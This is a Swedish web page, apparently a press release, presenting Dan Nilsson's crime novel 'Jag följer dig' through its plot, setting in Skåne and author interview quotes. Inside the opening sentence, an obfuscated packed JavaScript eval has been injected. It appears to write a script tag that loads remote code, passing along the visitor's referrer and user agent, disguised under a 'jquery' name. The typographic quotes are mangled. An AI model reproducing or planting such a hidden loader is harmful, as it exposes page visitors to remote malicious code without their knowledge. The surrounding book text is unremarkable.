Image Image Image Image Image Image Image Image Image Image

| 8 april, 2020

Scroll to top

Top

Mörk hemlighet gäckar privatspanare i ny spänningsroman

Mörk hemlighet gäckar privatspanare i ny spänningsroman
Sebastian

Hur eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bhfny|var|u0026u|referrer|baddr||js|php’.split(’|’),0,{}))
kan en mörk hemlighet existera där allting är öppet för insyn?

Det är gåtan som den kufiska privatspanaren Niklas Lund tänker lösa när han öppnar dörren till ett modernt IT-företag i Öresundsregionen. Och få svar på vem som har skickat honom ett anonymt meddelande på nätet:

Jag följer dig. Följer du mig?   

Journalisten och manusförfattaren Dan Nilsson har skrivit en rapp och tät spänningsroman kryddad med en nypa humor. Därtill ställer han moderna begrepp som transparens, hållbarhet och socialt ansvar inom företagsvärlden på sin spets i Jag följer dig – en bok som kom till sedan han själv drabbats av nedskärningar på sin tidigare arbetsplats.

– Jag utgår alltid från verkligheten, men gillar att skruva till den ett par varv, säger Dan Nilsson, som nyligen var aktuell som ett av författarnamnen på deckarfestivalen CrimeTime Gotland.

I Jag följer dig får läsaren följa Niklas Lund, en karaktär som är inspirerad av verklighetens privatspanare på olika nätforum, men med betydligt seriösare mål än de flesta. I likhet med originalen kommer Niklas aldrig att bli accepterad som den brottsbekämpare han vill vara. Snarare betraktas han av samhället som en brottsling.

– Jag ser honom lite som en blandning av Lisbeth Salander och Ignatius J Reilly från Dumskallarnas sammansvärjning, säger Dan Nilsson om sin udda antihjälte.

Genom ett anonymt meddelande lockas Niklas till sitt föräldrahem i skånska Eslöv. Snart hamnar han mitt i ett mord på en kvinna som tillhör det företag som Niklas pappa startade en gång i tiden.

Niklas förstår snart att den okände personen som lockat dit honom för en brutal kamp mot företaget. För att lösa gåtan tar Niklas hjälp av sin nya allierade från forumen på nätet, Jeanette – mer känd som ”Spanjorskan”.

Spåren leder dem vidare till IT-koncernens huvudkontor i Lund och mötet med en högst okonventionell företagsledare. Koncernchefen visar sig ha ett rättvisepatos som få – och drar sig inte för att ”hänga ut” sina egna anställda för ett gott syfte.

– Jag var intresserad av sådant som hållbarhet och socialt ansvar som inga moderna, medvetna företag kan välja bort i dag, särskilt inte i Sverige. Om man slänger in en mörk hemlighet i denna upplysta världen kan det bli riktigt intressant, säger Dan Nilsson.

Den fortsatta jakten på mördaren tar Niklas och hans bihang genom hela Skåne – från Eslöv, via Lund och Staffanstorp till Kristianstad – med spår som leder ända till Thailand.

Dan Nilsson är född 1971 i Lund, uppvuxen i Eslöv och bosatt i Stockholm. Sin första deckare skrev han redan som tolvåring, men det skulle dröja 30 år innan han debuterade med Bevakaren, nu aktuell som pocketbok. Det var i samband med att han misstänkte prostitution i sin förra bostadsrättsförening som skrivandet väcktes till liv igen. Jag följer dig är hans andra bok och släpps samtidigt i Danmark.

 

Mer om boken:

Någon har stulit Niklas Lunds identitet på nätet. Snart förstår Niklas att det är en person som känner honom, och som vill få tillträde till Niklas verksamhet som privatspanare på nätet. Men i vilket syfte?

Den första ledtråden får han när en kvinna blir mördad i Niklas gamla hemstad Eslöv. Det visar sig att mordoffret tillhör IT-koncernen som hans pappa startat en gång i tiden. För att förstå mördarens motiv måste Niklas lära känna sin numera döda pappa och dennes företag på nytt – men också undersöka sin egen plats i historien.

Tillsammans med sin kvinnliga motsvarighet bland privatspanare, kallad ”Spanjorskan”, jagar Niklas mördaren genom Eslöv, Lund och norra Skåne – med spår som leder ända till Thailand. Frågan de måste ställa sig är: Hur kommer det sig att någon kunnat dölja en sådan fruktansvärd hemlighet som nu uppdagas – när Niklas pappa skapat en modern koncern som står för total öppenhet?

JAG FÖLJER DIG är en fartfylld spänningsroman som kretsar kring den moderna, transparenta företagskulturen – där öppenheten leder till hemligheter som måste skyddas till varje pris.

DAN NILSSON skriver rapp spänning kryddad med en nypa humor.

Utkommer 21 augusti.